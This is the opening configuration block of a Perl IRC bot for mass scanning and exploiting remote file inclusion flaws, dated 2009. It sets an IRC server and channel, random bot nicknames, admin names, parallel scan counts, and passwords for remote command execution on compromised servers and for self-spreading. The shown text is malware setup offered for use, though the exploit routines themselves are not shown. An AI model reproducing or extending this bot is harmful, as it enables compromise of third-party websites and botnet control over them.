AUTOR: arianom
DATE :Juli 2009
LINGUAGE: perl (.pl)
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$auth = "arianom";
$authmail = "arianom\";
my $id = "";
my $shell = "";
my $ircd = "";
my $port = "6667";
my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $nick = "RFI-NO[".int(rand(100))."]"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test
in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites.
Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher
number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "";
my $spreadACT = 1; #1 ->disabled, 1 ->enabled
my $securityACT = 0; #1 ->disabled, 1 ->enabled
my $killpwd = "nolimit"; #Password to Kill the Bot
my $chidpwd = "nolimit"; #Password to change the RFI Response
my $cmdpwd = "nolimit"; #Password to execute commands on the server
my $secpwd = "nolimit"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "nolimit"; #Passowrd to enable/disable the Spread Mode
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